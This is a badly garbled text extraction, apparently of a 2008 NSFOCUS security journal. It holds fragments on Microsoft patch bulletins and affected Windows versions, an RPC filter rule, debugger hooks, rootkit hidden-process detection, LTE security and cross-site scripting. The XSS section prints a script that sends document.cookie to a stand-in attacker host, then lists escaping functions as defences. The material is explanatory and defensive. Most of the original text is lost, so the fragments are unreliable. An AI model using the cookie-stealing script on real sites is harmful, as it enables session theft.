¼¼Êõ°æ · 2015. 4. 10. · Excel 2002 Service Pack 3 Excel 2003 Service Pack 2 Excel 2003...

of 80/80
003 2008/12 Share technique experience with security professionals DFI DPI DFI DPI
  • date post

    02-Sep-2021
  • Category

    Documents

  • view

    1
  • download

    0

Embed Size (px)

Transcript of ¼¼Êõ°æ · 2015. 4. 10. · Excel 2002 Service Pack 3 Excel 2003 Service Pack 2 Excel 2003...

¼¼Êõ°æDFI DPIDFI DPI
NSFOCUS ID: 12608
NSFOCUS ID: 12605
JScript VBScript Visual Studio
HTML
NSFOCUS ID: 12604
NSFOCUS ID: 12615
NSFOCUS ID: 12613
Apache
der 8.1.3
Office CDO cdo: Content-
Excel 2007
Microsoft Office Excel Viewer 2003 Ser-
vice Pack 3
10 11
MS08-056 MS08-066
20 Win-
Service Pack 1
2. MS08-057 - Microsoft Excel
Excel VBA
Pack 4
Pack 1
(956695)
Service Pack 2
Open XML File Format Converter for Mac
7
SNA
Windows
vice Pack 4
gration Server 2006 SNA RPC
6. MS08-061 - Windows
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition
Service Pack 2
dows Server 2003 x64 Edition Service Pack 2
Microsoft Host Integration Server 2004
Microsoft Host Integration Server 2004
Service Pack 1
Service Pack 1
32
x64
8
Pack 1
Vista x64 Edition Service Pack 1
Windows Server 2008 32
Windows Server 2008 x64
Windows Server 2008 Itanium
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition
Service Pack 2
Windows
dows Server 2003 x64 Edition Service Pa-
ck 2
Pack 1
Vista x64 Edition Service Pack 1
Windows Server 2008 32
Windows Server 2008 x64
Windows Server 2008 Itanium
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Servi-
ce Pack 2
dows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP1
Itanium Windows Server 2003
Pack 1
Microsoft SMB
Vista x64 Edition Service Pack 1
Windows Server 2008 32
Windows Server 2008 x64
Windows Server 2008 Itanium
Windows XP Professional x64 Edition Ser-
vice Pack 2
dows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP1
Itanium Windows Server 2003
Pack 1
Vista x64 Edition Service Pack 1
Windows Server 2008 32
Windows Server 2008 x64
RPC
RPC
1024
RPC
Windows
Windows XP Professional x64 Edition Ser-
vice Pack 2
dows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP1
Itanium Windows Server 2003
icrosoft Windows 2000 Service
Service Pack 2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Ser-
vice Pack 2
Itanium-based Systems
Itanium-based Systems
Pack 1
Vista x64 Edition Service Pack 1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Sys-
tems
Systems
10
actiontype=block
if_uuid matchtype=equal data=4b324fc8-
1670-01d3-1278-5a47bf6ee188
netsh rpc filter>quit
14
2007
3000
address
address
hooks.add(dbg, addr_AESEncrypt, 2, AESEncrypt_hook,None)
hooks.add(dbg, addr_AESDecrypt,2 None, AESDecrypt_hook)
1
2.1
DFI
DFI
IP
25
3531
IP
CPU ARM CPU
4.4 ASIC/NP
4.5 ASIC/NP
FDCC
NIST
ISAP
protocol SCAP CVE CCE CPE XCCDF OVAL CVSS
6 6
Windows XP Windows
Vulnerability Database
8132af5c SMSS.EXE
8134af5c CSRSS.EXE
8119375c WINLOGON.EXE
ActiveProccessLinks ExpGetP-
plist_active_procs->Blink;
FU_Rootkit 2.5
EPROCESS ActiveProcessLinks
EPROCESS MmProcessLinks Idle
+0x154 ImageFileName 16 Idle
238
(PsInitialSystemProcess)
EnablePrivilege(SE_DEBUG_NAME)
ZwSystemDebugControl
Windows 2000 EPROCESS
p I m a g e F i l e N a m e
_UNICODE_STRING
org.sg)
http://www.security.org.sg/code/kproccheck.html
EPROCESS
Vm.WorkingSetExpansionLinks
SwapContext Function kkasslin(kk[email protected])
([email protected])
http://www.phrack.org/phrack/59/p59-0x10.txt
ew&mid=2119
Multimedia Broadcast Multicast Service
3G 2006
LTE/SAE
LTE/SAE
eNB X2 eNB
3 HE SN
MME NAS
KUPenc UE eNB KeNB
AV UMTS AV CK/IK SAE AV Kasme HSS
AS NAS
UP
5
NAS
51
7
LTE/SAE UE eNB MME
EUTRAN UTRAN GERAN non-3GPP
NE SEG NE
SEG Za
54
1
Web
SNS
SAP
2
Plan
Do
Check
Act
61
XSS
Web
Q1
HTML XML
Q5 XSS
<scr ipt>window.open http: / /www
at tacke r e x a m p l e . com / c o l l ect .cgi?
cookie= +document.cookie </script>
2. XSS
JavaScript www.attackerexample.
c o m c o l l e c t . c g i w w w .
vulnerableexample.com cookie
www.vulnerable.site cookie
PHP
htmlentities()
htmlspecialchars()
register_globals
XSS
66
[1] Cross Site Scripting Explained, Amit Klein, Sanctum Security Group, 2002 6
[2] The Cross Site Scripting (XSS) FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml
http://www.owasp.org/index.php/Top_10_2007-A1
projects/statistics/
JavaScript XML XSS
XP Windows Vista